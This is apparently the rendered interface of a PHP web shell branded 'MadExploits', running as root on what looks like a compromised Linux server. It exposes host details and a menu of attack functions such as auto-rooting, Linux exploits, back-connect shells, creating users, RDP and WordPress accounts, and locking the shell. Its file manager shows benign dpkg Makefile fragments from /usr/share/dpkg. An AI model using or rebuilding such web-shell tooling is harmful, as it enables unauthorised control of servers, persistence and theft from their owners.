Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.43.133
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
sh
[ DIR ]
drwxr-xr-x
abitable
352
B
-rw-r--r--
architecture.mk
973
B
-rw-r--r--
buildapi.mk
710
B
-rw-r--r--
buildflags.mk
2.77
KB
-rw-r--r--
buildopts.mk
886
B
-rw-r--r--
buildtools.mk
2.95
KB
-rw-r--r--
cputable
2.01
KB
-rw-r--r--
default.mk
739
B
-rw-r--r--
no-pie-compile.specs
77
B
-rw-r--r--
no-pie-link.specs
65
B
-rw-r--r--
ostable
1.84
KB
-rw-r--r--
pie-compile.specs
97
B
-rw-r--r--
pie-link.specs
76
B
-rw-r--r--
pkg-info.mk
3.28
KB
-rw-r--r--
tupletable
2.67
KB
-rw-r--r--
vendor.mk
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buildflags.mk
# This Makefile fragment (since dpkg 1.16.1) defines the following host # variables: # # ASFLAGS: Flags for the host assembler (since 1.21.0). # CFLAGS: Flags for the host C compiler. # CPPFLAGS: Flags for the host C preprocessor. # CXXFLAGS: Flags for the host C++ compiler. # OBJCFLAGS: Flags for the host Objective C compiler. # OBJCXXFLAGS: Flags for the host Objective C++ compiler. # DFLAGS: Flags for the host D compiler. # FFLAGS: Flags for the host Fortran 77 compiler. # FCFLAGS: Flags for the host Fortran 9x compiler. # LDFLAGS: Flags for the host linker. # # And the following variables for the build tools (since dpkg 1.22.1): # # ASFLAGS_FOR_BUILD: Flags for the build assembler. # CFLAGS_FOR_BUILD: Flags for the build C compiler. # CPPFLAGS_FOR_BUILD: Flags for the build C preprocessor. # CXXFLAGS_FOR_BUILD: Flags for the build C++ compiler. # OBJCFLAGS_FOR_BUILD: Flags for the build Objective C compiler. # OBJCXXFLAGS_FOR_BUILD: Flags for the build Objective C++ compiler. # DFLAGS_FOR_BUILD: Flags for the build D compiler. # FFLAGS_FOR_BUILD: Flags for the build Fortran 77 compiler. # FCFLAGS_FOR_BUILD: Flags for the build Fortran 9x compiler. # LDFLAGS_FOR_BUILD: Flags for the build linker. # # You can also export them in the environment by setting # DPKG_EXPORT_BUILDFLAGS to a non-empty value. # # Note: # - Only documented variables are considered public interfaces. # - Expects to be included from the source tree root directory. ifndef dpkg_buildflags_mk_included dpkg_buildflags_mk_included = yes # This list is kept in sync with the default set of flags returned # by dpkg-buildflags. dpkg_lazy_eval ?= $$(if $$(filter undefined,$$(flavor DPKG_CACHE_$(1))),$$(eval DPKG_CACHE_$(1) := $$(shell $(2)))$$(value DPKG_CACHE_$(1)),$$(value DPKG_CACHE_$(1))) DPKG_BUILDFLAGS_LIST := $(foreach var,\ ASFLAGS \ CFLAGS \ CPPFLAGS \ CXXFLAGS \ OBJCFLAGS \ OBJCXXFLAGS \ DFLAGS \ FFLAGS \ FCFLAGS \ LDFLAGS \ ,$(var) $(var)_FOR_BUILD) define dpkg_buildflags_export_envvar ifdef $(1) DPKG_BUILDFLAGS_EXPORT_ENVVAR += $(1)="$$(value $(1))" endif endef $(eval $(call dpkg_buildflags_export_envvar,DEB_BUILD_OPTIONS)) $(eval $(call dpkg_buildflags_export_envvar,DEB_BUILD_MAINT_OPTIONS)) $(eval $(call dpkg_buildflags_export_envvar,DEB_BUILD_PATH)) $(foreach flag,$(DPKG_BUILDFLAGS_LIST),\ $(foreach operation,SET STRIP APPEND PREPEND,\ $(eval $(call dpkg_buildflags_export_envvar,DEB_$(flag)_MAINT_$(operation))))) dpkg_buildflags_setvar = $(1) = $(call dpkg_lazy_eval,$(1),$(DPKG_BUILDFLAGS_EXPORT_ENVVAR) dpkg-buildflags --get $(1)) $(foreach flag,$(DPKG_BUILDFLAGS_LIST),\ $(eval $(call dpkg_buildflags_setvar,$(flag)))) ifdef DPKG_EXPORT_BUILDFLAGS export $(DPKG_BUILDFLAGS_LIST) endif endif # dpkg_buildflags_mk_included
Close